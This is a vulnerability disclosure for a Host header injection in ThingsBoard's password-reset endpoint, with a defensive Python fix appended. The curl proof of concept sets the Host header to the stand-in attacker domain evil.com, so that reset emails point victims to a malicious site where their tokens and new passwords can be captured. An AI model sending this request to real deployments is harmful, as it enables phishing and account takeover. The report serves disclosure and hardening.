This vulnerability allows an attacker to inject a Host header, which is used to generate password reset links, among other things.
PoC:
curl 'https://thingsboard_host/api/noauth/resetPasswordByEmail' \
  -H 'Host: evil.com' \
  -H 'Connection: keep-alive' \
  -H 'Accept: application/json, text/plain, */*' \
  -H 'User-Agent: Mozilla/5.0' \
  -H 'Content-Type: application/json' \
  -H 'Origin: https://thingsboard_host' \
  -H 'Sec-Fetch-Site: same-origin' \
  -H 'Sec-Fetch-Mode: cors' \
  -H 'Sec-Fetch-Dest: empty' \
  -H 'Referer: https://thingsboard_host/login/resetPasswordRequest' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  --data-binary '{"email":"victim@example"}' \
  --compressed
This sends the victim an email that points to https://evil.com instead of the actual ThingsBoard URL. An attacker can use this to trick users into submitting their password reset tokens and new passwords to malicious websites linked from genuine ThingsBoard emails.
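
The root cause and one way to fix it, as an added example that is not ThingsBoard's code: a link builder that trusts the request's Host header, beside one that checks Host against an allowlist and builds the link from server configuration only. The function names, the `/reset-password` path, the base URL and the allowlist are assumptions for illustration.

```python
from urllib.parse import quote, urlsplit

# Assumed deployment settings (hypothetical values, not from ThingsBoard).
CONFIGURED_BASE_URL = "https://thingsboard_host"
ALLOWED_HOSTS = {"thingsboard_host"}
RESET_PATH = "/reset-password"  # hypothetical path


def vulnerable_reset_link(headers, token):
    """The pattern the report describes: the link origin comes from the request."""
    return f"https://{headers.get('Host', '')}{RESET_PATH}?token={token}"


def normalize_host(value):
    """Return the lower-cased hostname from a Host header value, or None if malformed."""
    if not value or any(c in value for c in "/\\@?# \t\r\n"):
        return None  # userinfo, path or whitespace tricks are never a valid Host
    try:
        parts = urlsplit("//" + value)
        parts.port  # raises ValueError for a non-numeric or out-of-range port
    except ValueError:
        return None
    return parts.hostname.lower() if parts.hostname else None


def hardened_reset_link(headers, token):
    """Reject unexpected Host values and never copy the header into the link."""
    host = normalize_host(headers.get("Host"))
    if host not in ALLOWED_HOSTS:
        raise ValueError(f"rejected Host header: {headers.get('Host')!r}")
    return f"{CONFIGURED_BASE_URL}{RESET_PATH}?token={quote(token, safe='')}"


if __name__ == "__main__":
    # Constructed request headers mirroring the PoC above.
    poc = {"Host": "evil.com", "Origin": "https://thingsboard_host"}
    legit = {"Host": "thingsboard_host"}
    token = "CONSTRUCTED-TOKEN"

    print("vulnerable:", vulnerable_reset_link(poc, token))
    print("hardened  :", hardened_reset_link(legit, token))
    try:
        hardened_reset_link(poc, token)
    except ValueError as exc:
        print("hardened  :", exc)
```

Rejecting the request is optional once the link is built from configuration, but the rejection gives operators a log line to alert on when reset requests arrive with an unexpected Host value.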